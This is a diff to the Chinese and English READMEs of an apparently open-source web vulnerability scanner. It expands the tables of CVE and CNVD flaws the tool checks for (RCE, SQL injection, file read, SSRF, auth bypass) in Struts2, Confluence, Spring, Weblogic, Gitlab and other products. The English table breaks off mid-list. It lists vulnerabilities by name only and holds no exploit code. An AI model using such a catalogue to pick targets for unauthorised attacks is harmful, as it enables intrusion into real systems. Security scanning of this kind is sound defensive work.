diff --git a/README.md b/README.md index 7ef23a1..eb805eb 100644 --- a/README.md +++ b/README.md @@ -6,108 +6,126 @@ * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou <details> <summary><strong>目前支持扫描的web漏洞有: [点击展开]</strong></summary> ``` -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 | -| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 | -| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 | -| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 | -| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 | -| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 | -| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 | -| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 | -| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | GET | 全局变量防御绕过RCE | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | debug page XSS跨站脚本攻击 | -| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 | -| Django | CVE-2019-14234 | SQLinject | GET | JSONfield SQL注入 | -| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 | -| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQL 注入 | -| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML 反序列化代码执行 | -| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 远程代码执行 | -| Drupal | CVE-2018-7602 | RCE | POST | Drupal 远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 | -| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 | -| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 | -| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 | -| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 | -| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <= 1.2.47 反序列化 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins 远程命令执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | POST | 未授权远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js目录穿越 | -| Nodejs | CVE-2021-21315 | RCE | GET | Node.js命令执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED 任意文件读取 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc 任意文件上传 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 | -| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 | -| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 | -| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 | -| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic 权限验证绕过 | -| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic 未授权命令执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth 远程代码执行 | -| Webmin | CVE-2019-15642 | RCE | POST | Webmin 远程代码执行 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 | -| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 | -+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+ ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Target | Vul_id | Type | Description | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | 阿里巴巴Druid未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | 阿里巴巴Nacos未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | Airflow身份验证绕过 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX默认密钥 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | Flink目录遍历 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 | +| Apache Struts2 | S2-005 | RCE | Struts2远程代码执行 | +| Apache Struts2 | S2-007 | RCE | Struts2远程代码执行 | +| Apache Struts2 | S2-008 | RCE | Struts2远程代码执行 | +| Apache Struts2 | S2-009 | RCE | Struts2远程代码执行 | +| Apache Struts2 | S2-012 | RCE | Struts2远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT方法任意文件写入 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | AppWeb身份认证绕过 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence任意文件包含 | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence路径遍历和命令执行 | +| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence Webwork Pre-Auth OGNL表达式命令注入 | +| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | 思科ASA/FTD XSS跨站脚本攻击 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Discuz | wooyun-2010-080723 | RCE | 全局变量防御绕过RCE | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | debug page XSS跨站脚本攻击 | +| Django | CVE-2018-14574 | Redirect | CommonMiddleware url重定向 | +| Django | CVE-2019-14234 | SQLinject | JSONfield SQL注入 | +| Django | CVE-2020-9402 | SQLinject | GIS SQL注入 | +| Django | CVE-2021-35042 | SQLinject | QuerySet.order_by SQL注入 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQL 注入 | +| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML 反序列化代码执行 | +| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 远程代码执行 | +| Drupal | CVE-2018-7602 | RCE | Drupal 远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch命令执行 | +| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy 沙盒绕过&&代码执行 | +| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch 目录穿越 | +| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch 目录穿越 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP远程代码执行 | +| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP身份认证绕过 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 反序列化 | +| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 反序列化 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Gitea | None | unAuth | Gitea 1.4.0 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth 远程命令执行 | +| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API未授权 SSRF | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 | +| Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| NodeRED | CVE-2021-3223 | FileRead | Node-RED 任意文件读取 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails 路径遍历 | +| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails 任意文件读取 | +| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails 命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc 任意文件上传 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | Spring Cloud目录遍历 | +| Spring | CVE-2021-21234 | FileRead | Spring Boot目录遍历 | +| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl远程代码执行 | +| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL远程代码执行 | +| Spring | CVE-2022-22965 | RCE | Spring Framework远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x 远程代码执行 | +| ThinkPHP | CNVD-2018-24942 | RCE | 未开启强制路由导致RCE | +| ThinkPHP | CNNVD-201901-445 | RCE | 核心类Request远程代码执行 | +| ThinkPHP | None | RCE | ThinkPHP2.x 远程代码执行 | +| ThinkPHP | None | SQLinject | ThinkPHP5 ids参数SQL注入 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Ueditor | None | SSRF | Ueditor编辑器SSRF | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic 服务端请求伪造 | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder反序列化 | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async反序列化 | +| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic 权限验证绕过 | +| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic 未授权命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth 远程代码执行 | +| Webmin | CVE-2019-15642 | RCE | Webmin 远程代码执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Yonyou | CNNVD-201610-923 | SQLinject | 用友GRP-U8 Proxy SQL注入 | +| Yonyou | CNVD-2021-30167 | RCE | 用友NC BeanShell远程命令执行 | +| Yonyou | None | FileRead | 用友ERP-NC NCFindWeb目录遍历 | +| Yonyou | None | DSinfo | 用友U8 OA getSessionList.jsp 敏感信息泄漏 | +| Yonyou | None | SQLinject | 用友U8 OA test.jsp SQL注入 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ ``` </details> diff --git a/README_en-us.md b/README_en-us.md index 8ba3b09..b67389b 100644 --- a/README_en-us.md +++ b/README_en-us.md @@ -5,108 +5,126 @@ * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou <details> <summary><strong>The current web vulnerabilities that support scanning: [Click on]</strong></summary> ``` -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution | -| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution | -| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution | -| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution | -| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution | -| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include | -| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE | -| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection | -| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | GET | Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS | -| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect | -| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject | -| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject | -| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQLinject | -| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML Remote code execution | -| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 Remote code execution | -| Drupal | CVE-2018-7602 | RCE | POST | Drupal Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution | -| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE | -| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal | -| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution | -| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization | -| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | POST | Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js Directory traversal | -| Nodejs | CVE-2021-21315 | RCE | GET | Node.js Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED Directory traversal | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc writes to any file | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal | -| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution | -| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution | -| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor SSRF | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization | -| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass | -| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution | -| Webmin | CVE-2019-15642 | RCE | POST | Webmin Remote code execution | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution | -| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal | -+----------------------+--------------------+--------------+----------+------------------------------------------------------------+ ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Target | Vul_id | Type | Description | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | Alibaba Druid unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | Alibaba Nacos unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | Airflow Authentication bypass | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX default access token | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | Flink Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution | +| Apache Struts2 | S2-005 | RCE | Struts2 Remote code execution | +| Apache Struts2 | S2-007 | RCE | Struts2 Remote code execution | +| Apache Struts2 | S2-008 | RCE | Struts2 Remote code execution | +| Apache Struts2 | S2-009 | RCE | Struts2 Remote code execution | +| Apache Struts2 | S2-012 | RCE | Struts2 Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | Put method writes to any file | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | AppWeb Authentication bypass | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence any file include | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence Directory traversal && RCE | +| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence OGNL expression command injection | +| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | Cisco ASA/FTD XSS | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Discuz | wooyun-2010-080723 | RCE | Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | Django debug page XSS | +| Django | CVE-2018-14574 | Redirect | Django CommonMiddleware URL Redirect | +| Django | CVE-2019-14234 | SQLinject | Django JSONfield SQLinject | +| Django | CVE-2020-9402 | SQLinject | Django GIS SQLinject | +| Django | CVE-2021-35042 | SQLinject | Django QuerySet.order_by SQLinject | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQLinject | +| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML Remote code execution | +| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 Remote code execution | +| Drupal | CVE-2018-7602 | RCE | Drupal Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch Remote code execution | +| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy Sandbox to bypass && RCE | +| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch Directory traversal | +| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP Remote code execution | +| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP Authentication bypass | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 deSerialization | +| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <=1.2.47 deSerialization | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Gitea | None | unAuth | Gitea 1.4.0 unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth Remote code execution | +| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API SSRF | 